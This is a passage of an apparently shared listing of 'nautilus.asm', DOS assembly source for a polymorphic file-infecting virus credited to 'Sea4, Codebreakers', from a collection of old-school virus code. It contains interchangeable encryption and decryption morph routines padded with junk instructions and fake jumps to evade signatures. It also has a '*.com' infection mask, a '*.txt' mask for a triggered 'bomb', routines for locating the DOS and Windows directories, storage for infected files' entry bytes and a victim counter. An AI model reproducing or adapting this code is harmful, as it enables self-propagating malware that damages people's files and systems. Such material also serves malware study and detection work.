nautilus.asm
来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 1,143 行 · 第 1/3 页
ASM
1,143 行
mov si,di ; 2
; = 18
PosCC3:
sti ; 1
lea si,[bp+hidden] ; 4
mov dh,[bp+Xor1val] ; 4
mov di,si ; 2
mov dl,[bp+DecVal1] ; 4
mov cx,cryptie-hidden ; 3
; = 18
PosCC4:
lea di,[bp+hidden] ; 4
mov cx,cryptie-hidden ; 3
clc ; 1
mov si,di ; 2
mov dh,[bp+Xor1val] ; 4
mov dl,[bp+DecVal1] ; 4
; = 18
PosCC5:
mov dl,[bp+DecVal1] ; 4
mov dh,[bp+Xor1val] ; 4
mov cx,cryptie-hidden ; 3
lea si,[bp+hidden] ; 4
mov di,si ; 2
nop ; 1
; = 18
PosCC6:
mov dh,[bp+Xor1val] ; 4
lea si,[bp+hidden] ; 4
cld ; 1
mov cx,cryptie-hidden ; 3
mov di,si ; 2
mov dl,[bp+DecVal1] ; 4
; = 18
PosCC7:
mov cx,cryptie-hidden ; 3
nop ; 1
mov dl,[bp+DecVal1] ; 4
mov dh,[bp+Xor1val] ; 4
lea di,[bp+hidden] ; 4
mov si,di ; 2
; = 18
PosCC8:
mov dl,[bp+DecVal1] ; 4
lea si,[bp+hidden] ; 4
mov cx,cryptie-hidden ; 3
stc ; 1
mov di,si ; 2
mov dh,[bp+Xor1val] ; 4
; = 18
PosCDC: ; Possible Call DCryptie, size 12h ( 18d ) bytes
mov cx,DCryptie-Dhidden ; 3
lea si,[bp+Dhidden] ; 4
mov di,si ; 2
nop ; 1
mov dl,[bp+DecVal2] ; 4
mov dh,[bp+Xor2Val] ; 4
; = 18
PosCDC2:
lea si,[bp+Dhidden] ; 4
mov dh,[bp+Xor2Val] ; 4
mov di,si ; 2
clc ; 1
mov cx,DCryptie-Dhidden ; 3
mov dl,[bp+DecVal2] ; 4
; = 18
PosCDC3:
mov dh,[bp+Xor2Val] ; 4
mov dl,[bp+DecVal2] ; 4
lea si,[bp+Dhidden] ; 4
nop ; 1
mov di,si ; 2
mov cx,DCryptie-Dhidden ; 3
; = 18
PosCDC4:
lea di,[bp+Dhidden] ; 4
sti ; 1
mov dl,[bp+DecVal2] ; 4
mov si,di ; 2
mov cx,DCryptie-Dhidden ; 3
mov dh,[bp+Xor2Val] ; 4
; = 18
PosCDC5:
cld ; 1
lea si,[bp+Dhidden] ; 4
mov cx,DCryptie-Dhidden ; 3
mov di,si ; 2
mov dh,[bp+Xor2Val] ; 4
mov dl,[bp+DecVal2] ; 4
; = 18
PosCDC6:
lea si,[bp+Dhidden] ; 4
mov cx,DCryptie-Dhidden ; 3
mov dl,[bp+DecVal2] ; 4
nop ; 1
mov dh,[bp+Xor2Val] ; 4
mov di,si ; 2
; = 18
PosCDC7:
lea di,[bp+Dhidden] ; 4
mov cx,DCryptie-Dhidden ; 3
mov si,di ; 2
mov dh,[bp+Xor2Val] ; 4
cld ; 1
mov dl,[bp+DecVal2] ; 4
; = 18
PosCDC8:
mov dh,[bp+Xor2Val] ; 4
mov dl,[bp+DecVal2] ; 4
nop ; 1
lea di,[bp+Dhidden] ; 4
mov si,di ; 2
mov cx,DCryptie-Dhidden ; 3
; = 18
PosCR: ; Possible Cryptie Routines, each 14 bytes
neg al ; 2
xor al,13h ; 2
not al ; 2
rol al,cl ; 2
not al ; 2
xor al,13h ; 2
neg al ; 2
; = 14
Pos2CR: ; Possible DCryptie Routines, each 14 bytes
xor al,72h ; 2
neg al ; 2
rol al,cl ; 2
not al ; 2
rol al,cl ; 2
neg al ; 2
xor al,72h ; 2
; = 14
PosCR2:
neg al ; 2
sti ; 1
rol al,cl ; 2
nop ; 1
clc ; 1
neg al ; 2
rol al,cl ; 2
cld ; 1
neg al ; 2
; = 14
Pos2CR2:
rol al,cl ; 2
sti ; 1
xor al,0C4h ; 2
ror al,cl ; 2
stc ; 1
nop ; 1
xor al,0C4h ; 2
clc ; 1
rol al,cl ; 2
; = 14
PosCR3:
not al ; 2
xor al,0AAh ; 2
stc ; 1
nop ; 1
clc ; 1
neg al ; 2
xor al,0AAh ; 2
sti ; 1
not al ; 2
; = 14
Pos2CR3:
ror al,cl ; 2
cmp al,cl ; 2
stc ; 1
xor al,ch ; 2
ror al,cl ; 2
xor al,ch ; 2
cld ; 1
ror al,cl ; 2
; = 14
PosCR4:
rol al,cl ; 2
neg al ; 2
nop ; 1
xor al,55h ; 2
sti ; 1
neg al ; 2
std ; 1
rol al,cl ; 2
cld ; 1
; = 14
Pos2CR4:
cmp al,12h ; 2
jne Fakejmp ; 2
Fakejmp:
sti ; 1
cld ; 1
rol al,cl ; 2
nop ; 1
nop ; 1
xor al,ch ; 2
rol al,cl ; 2
; = 14
PosCR5:
cld ; 1
ror al,cl ; 2
xor al,ch ; 2
not al ; 2
nop ; 1
nop ; 1
xor al,ch ; 2
nop ; 1
ror al,cl ; 2
; = 14
Pos2CR5:
ror al,cl ; 2
xor al,ch ; 2
rol al,cl ; 2
not al ; 2
rol al,cl ; 2
xor al,ch ; 2
ror al,cl ; 2
; = 14
PosCR6:
xor al,ch ; 2
nop ; 1
xchg bx,dx ; 2
nop ; 1
nop ; 1
ror al,cl ; 2
stc ; 1
xor al,ch ; 2
xchg bx,dx ; 2
; = 14
Pos2CR6:
rol al,cl ; 2
xor al,ch ; 2
nop ; 1
xor al,0D8h ; 2
cmp al,4h ; 2
xor al,ch ; 2
sti ; 1
rol al,cl ; 2
; = 14
PosCR7:
xor al,ch ; 2
cmp al,4h ; 2
jne FakeJmp2 ; 2
stc ; 1
FakeJmp2:
sti ; 1
stc ; 1
cld ; 1
xchg bx,ax ; 1
xchg bx,ax ; 1
stc ; 1
nop ; 1
; = 14
Pos2CR7:
rol al,cl ; 2
xor al,ch ; 2
rol al,cl ; 2
not al ; 2
rol al,cl ; 2
xor al,ch ; 2
rol al,cl ; 2
; = 14
PosCR8:
xor al,ch ; 2
rol al,cl ; 2
xor al,ch ; 2
not al ; 2
xor al,ch ; 2
rol al,cl ; 2
xor al,ch ; 2
; = 14
Pos2CR8:
xor al,ch ; 2
rol al,cl ; 2
xor al,0C7h ; 2
neg al ; 2
xor al,0C7h ; 2
rol al,cl ; 2
xor al,ch ; 2
; = 14
EndMorphs:
filemask db '*.com',0 ; The type of files we are gonna infect.
textmask db '*.txt',0 ; Text files to find when bomb goes off
dos_mask db 'dos',0 ; Mask for finding DOS
win_mask db 'windows',0 ; Mask for finding Windows
win_com db 'command',0 ; Mask for finding .\windows\command
dot_dot db '..',0 ; Mask for previous directory.
saved db 0CDh,020h,0h ; This is the storage space for the first
; three bytes from the infected file. CD20 is
; the 'int 20h' instruction used to exit.
Infectedby db 'Sea4 ' ; Place to keep virus lineage
MyName db 'Nautilus.com ' ; Current infected file
Virus_Name db '[Nautilus]',0
Author db 'Sea4, Codebreakers',0
textlen EQU DCryptie-Line1
; Below is the first sentence of the Jules Verne classic from whence I got
; the name of this virus. "Twenty Thousand Leagues Under the Sea"
line1 db 'The year 1866 was made notable by a series of bizarre',CR,LF
line2 db 'events, a chain of mysterious phenomena which have never',CR,LF
line3 db 'been explained, that I am sure no one has forgotten.',CR,LF
CR EQU 0Dh
LF EQU 0Ah ; Carrige Return Line Feed ( next line )
DCryptie:
lodsb ; Gets next byte Doomed for De/Encryption
xchg dx,cx ; Saves the count while using the DE/ENcrypt value
MorphD1:
db 14 dup 90h ; The encryption instructions will be at most
; 14 bytes long.
xchg dx,cx ; Returns the count value to CX
stosb ; Puts the encrypted byte into mem
loop DCryptie ; Does all the bytes specified by CX
ret ; Jumps back to the caller
Xor2Val db 00h ; Xor value to be used in DCryptie
DecVal2 db 00h ; Decrypt value 2
EncVal2 db 00h ; Encrypt value 2
Cryptie:
lodsb ; Gets the next byte to De/Encrypt
xchg dx,cx
MorphD2:
db 14 dup 90h ; The encryption instructions will be at most
; 14 bytes long.
xchg dx,cx
stosb ; Plugs AL back into mem
loop Cryptie ; Does all the bytes specified by CX
ret ; Jumps back to where it was called
Xor1Val db 00h ; Xor value to be used in Cryptie
DecVal1 db 00h ; Decrypt value 1
EncVal1 db 00h ; Encrypt value 1
ende:
; Here is a buffer specifically for file attributes/date/time/size
; It is not saved with the virus, so it doesn't actually take up mem. :)
; Just the offsets are used.
s_attr db 0h ; File attributes
s_time dw 0h ; Saved Time Last Modified
s_date dw 0h ; Saved Date Last Modified
s_size dd 0h ; Size of file ( before modification)
Victems db 00h ; Place to keep count of victems
CurDIR db 64 DUP (90)
buffer:
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?